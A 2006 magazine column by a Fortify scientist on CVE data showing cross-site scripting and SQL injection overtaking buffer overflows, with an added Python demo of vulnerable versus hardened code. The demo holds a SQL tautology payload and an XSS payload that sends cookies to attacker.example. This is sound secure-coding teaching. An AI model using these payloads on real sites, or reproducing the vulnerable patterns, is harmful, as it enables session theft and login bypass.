The Rise of Cross-Site Scripting




November 15, 2006
Word is that next year Toyota will sell more vehicles than General Motors. This really shouldn’t come as too much of a surprise; Toyota has been turning a larger profit than GM for quite a while now. Still, it will be the first time in 80 years that GM hasn’t been on top. The world is not what it once was.

It turns out that something very similar has happened with software vulnerabilities.

Since the dawn of the Internet, the buffer overflow has been king. The Morris worm of 1988 (the first worm seen on the Internet) exploited a stack buffer overflow in the BSD fingerd daemon as one of its methods of propagation (the others were sendmail's DEBUG command and guessed passwords), and buffer overflows have dominated the vulnerability landscape ever since.

Well, until 2005 anyway. Steve Christey, one of the maintainers of the CVE database (cve.mitre.org), reports that in 2005, the most-reported vulnerability was cross-site scripting. Not only that, but buffer overflow wasn’t even in second place. The lineup in 2005 looked like this:

1. Cross-Site Scripting (16.0 percent)
2. SQL Injection (12.9 percent)
3. Buffer Overflow (9.8 percent)

2006 is shaping up to be even worse for the venerable buffer overflow; it’s on track to fall out of the top three:

1. Cross-Site Scripting (21.5 percent)
2. SQL Injection (14.0 percent)
3. PHP remote includes (9.5 percent)

Why such a dramatic change in software vulnerabilities? There are four things going on.

First, Web vulnerabilities are easy to find. Firewalls and intrusion detection systems don’t usually look at Web traffic, and most Web sites are quite content to allow you to poke at them until you’ve found the vulnerability you want. Attackers use tools to automatically scan sites for vulnerabilities.

Second, Web vulnerabilities are easier to exploit. In most cases, it’s a lot easier to develop a working exploit for a Web vulnerability than it is to write some robust shell code to exploit a buffer overflow.

Third, there are valuable things on the Web. Every day there are more sites, more services, more transactions and more traffic on the Web. You could find plenty of cross-site scripting vulnerabilities in 1998 too, but there wasn’t so much to gain by exploiting them. There weren’t enough sites holding valuable data, and there weren’t enough visitors to make real money exploiting Web vulnerabilities.

Finally, it takes time and concerted effort to write Web applications that don't contain vulnerabilities. PHP makes it easy to accidentally allow cross-site scripting, SQL injection or remote file inclusion. Languages such as Java and C# make buffer overflow a vanishing possibility, and they even provide all the tools you need to avoid SQL injection (parameterized queries and prepared statements), but they still make cross-site scripting hard to avoid: nothing in the language stops a programmer from concatenating untrusted input straight into HTML.
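To make the two top entries in the tables above concrete, here is an added example (not from the article or from Fortify) showing the vulnerable form of each bug beside its hardened form. It is written in Python rather than PHP so that it runs against a real database engine (SQLite) with nothing to install; the `users` table, the tautology payload and the script-tag payload are constructed here purely for illustration.

```python
"""
Vulnerable-vs-hardened demonstration of SQL injection and reflected
cross-site scripting. Added example in Python; the sample table and the
attacker inputs are constructed for illustration.
"""
import html
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample data: an in-memory table of users and passwords."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "correct horse"), ("bob", "hunter2")],
    )
    return conn


# --- SQL injection ---------------------------------------------------------

def login_vulnerable(conn: sqlite3.Connection, name: str, password: str) -> bool:
    """String concatenation: attacker-controlled text becomes SQL syntax."""
    query = ("SELECT COUNT(*) FROM users WHERE name = '" + name
             + "' AND password = '" + password + "'")
    return conn.execute(query).fetchone()[0] > 0


def login_hardened(conn: sqlite3.Connection, name: str, password: str) -> bool:
    """Parameterized query: values travel separately from the SQL text, so a
    quote character in the input can never change the statement's structure."""
    query = "SELECT COUNT(*) FROM users WHERE name = ? AND password = ?"
    return conn.execute(query, (name, password)).fetchone()[0] > 0


# --- Cross-site scripting --------------------------------------------------

def greeting_vulnerable(name: str) -> str:
    """Echoes a request parameter into the page unchanged (reflected XSS)."""
    return "<p>Hello, " + name + "!</p>"


def greeting_hardened(name: str) -> str:
    """HTML-encodes the untrusted value for the element-body context it lands in."""
    return "<p>Hello, " + html.escape(name, quote=True) + "!</p>"


def contains_script_tag(page: str) -> bool:
    """Crude check for the demo: would the emitted markup start a <script> element?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    conn = build_db()
    # Classic tautology: closes the string literal, then makes the WHERE clause
    # true for every row because AND binds tighter than OR.
    payload = "' OR '1'='1"
    print("vulnerable login, injected password:", login_vulnerable(conn, "alice", payload))
    print("hardened login, injected password:  ", login_hardened(conn, "alice", payload))
    print("hardened login, real password:      ", login_hardened(conn, "alice", "correct horse"))

    xss = "<script>document.location='http://attacker.example/?c='+document.cookie</script>"
    print(greeting_vulnerable(xss))
    print(greeting_hardened(xss))
```

Note that the hardened XSS version is only correct because the value is emitted inside an element body; a value placed in an attribute, a URL or a script block needs the encoding for that context, which is exactly why the article calls cross-site scripting hard to avoid even in Java and C#.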

To make matters worse, we still haven’t made progress toward eliminating buffer overflows. Christey’s data shows that the number of buffer overflow reports is holding steady at between 250 and 450 per year. Web vulnerabilities, on the other hand, have skyrocketed beginning in 2003. (In total, there were three times as many vulnerabilities reported in 2005 as there were in 2001.)

If there’s one lesson to be taken away from this data, it’s this: You can no longer write a Web application without thinking about security. Programmers need to understand that their code isn’t complete until it’s secure.

Brian Chess is chief scientist at Fortify Software.

